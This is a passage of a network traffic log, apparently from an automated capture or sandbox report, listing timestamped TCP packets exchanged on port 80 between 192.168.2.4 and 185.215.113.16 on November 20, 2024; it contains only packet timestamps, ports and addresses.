                                                                                                                                                                                            Nov 20, 2024 21:04:29.896996975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.897047043 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.897821903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.897938013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.897991896 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.898752928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.898847103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.900197029 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.901691914 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.901726007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.901777029 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.901778936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.901813030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.901848078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.901871920 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.901882887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.901935101 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.902529001 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.902667046 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.902725935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.903445959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.903697014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.903755903 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.904386997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.904545069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.904690981 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.905334949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.905421972 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.905471087 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.906212091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.906265974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.906322002 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.907152891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.907227993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.907423019 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.908113956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.908262968 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.908449888 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.908468962 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.909060955 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.909228086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.909631014 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.909965038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.910095930 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.910882950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.910937071 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.910959005 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.911007881 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.911822081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.911988020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.912718058 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.912750006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.912802935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.912856102 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.913701057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.913824081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.913896084 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.914623022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.914747000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.914889097 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.915564060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.915671110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.915726900 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.916511059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.916680098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.916733980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.917438030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.917577028 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.917638063 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.918339014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.918456078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.918508053 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.919302940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.919408083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.919527054 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.920229912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.920341969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.920397043 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.921149969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.921226978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.921295881 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.921663046 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.922091007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.922226906 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.923048019 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.923101902 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.923186064 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.923237085 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.924027920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.924083948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.924901962 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.925004959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.925004959 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.925055027 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.925862074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.925945997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.926009893 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.926784992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.926892996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.926947117 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.927701950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.927803040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.927912951 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.928618908 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.928738117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.928792953 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.929617882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.929671049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.929730892 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.930469990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.930598021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.930664062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.931415081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.931526899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.931581020 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.932360888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.932517052 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.932569027 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.933276892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.933435917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.933490992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.934216976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.934299946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.934379101 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.935203075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.935300112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.935357094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.936065912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.936187029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.936239958 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.936975002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.970514059 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.043056965 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.091429949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.091454983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.091530085 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.091604948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.091644049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.092559099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.092612028 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.092689037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.092734098 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.093456984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.093502998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.093549013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.094397068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.094657898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.094713926 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.095422029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.095520973 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.095567942 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.096271038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.096410036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.096456051 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.097193956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.097285032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.097347021 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.098229885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.098315954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.098514080 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.099200010 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.099339962 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.099384069 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.100183964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.100358009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.100429058 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.100990057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.101108074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.101170063 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.101861000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.101982117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.102027893 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.102816105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.102947950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.103132963 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.103737116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.103997946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.104049921 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.104652882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.104820013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.104871035 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.105602980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.105707884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.105747938 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.106535912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.106705904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.107466936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.107515097 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.107631922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.107675076 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.108395100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.108535051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.109323978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.109381914 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.109443903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.109488010 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.110304117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.110363007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.110408068 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.111165047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.111304045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.111356020 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.112101078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.112210989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.112256050 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.113050938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.113214016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.113259077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.114017010 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.114105940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.114502907 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.114918947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.115120888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.115175009 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.115870953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.116134882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.116779089 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.116802931 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.116863966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.116921902 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.117779970 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.117968082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.118103027 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.118753910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.118872881 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.118926048 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.119678974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.119786978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.119960070 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.120537043 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.120584011 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.120634079 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.121476889 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.121613979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.121659040 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.123354912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.123370886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.123416901 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.123723030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.123739958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.123804092 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.124289036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.124399900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.124444008 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.125305891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.125925064 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.125971079 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.126174927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.126296043 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.126334906 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.127049923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.127229929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.127274990 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.127789974 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.127974033 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.128124952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.128905058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.128948927 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.128999949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.129040956 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.129868984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.129997015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.130043983 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.130815029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.130897045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.131738901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.131788015 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.131859064 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.131902933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.132642984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.132723093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.132769108 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.133567095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.133709908 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.133757114 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.134511948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.134630919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.134681940 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.135443926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.135586023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.135634899 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.136392117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.136481047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.136526108 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.137334108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.137394905 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.137439966 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.138279915 CET8049744185.215.113.16192.168.2.4
